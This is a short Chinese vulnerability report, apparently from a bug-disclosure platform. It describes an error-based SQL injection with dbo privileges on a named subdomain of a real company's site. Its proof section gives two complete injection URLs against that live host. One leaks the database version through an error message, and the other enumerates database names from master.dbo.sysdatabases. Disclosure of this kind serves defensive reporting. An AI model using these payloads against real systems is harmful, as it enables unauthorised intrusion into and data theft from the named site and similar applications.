### 简要描述:
某二级站存在注入,可报错,可跨库。
### 详细说明:
dbo权限
### 漏洞证明:
报错注入:
http://tclub.ufida.com.cn/buyservice.asp?Money67=0&checkbox=69&Money69=100&checkbox=75&Money75=0&money=2012-12-20&flag=shopcar&shopcarflag=gwc&iRemainMoney=&checkbox=63&Money63=0&checkbox=65&Money65=0&checkbox=66&Money66=0&checkbox=67%27%20and%200=(@@version)--
可跨库:
http://tclub.ufida.com.cn/buyservice.asp?Money67=0&checkbox=69&Money69=100&checkbox=75&Money75=0&money=2012-12-20&flag=shopcar&shopcarflag=gwc&iRemainMoney=&checkbox=63&Money63=0&checkbox=65&Money65=0&checkbox=66&Money66=0&checkbox=67%27%20and%200=(select%20name%20from%20master.dbo.sysdatabases%20where%20dbid=9)--
暂无评论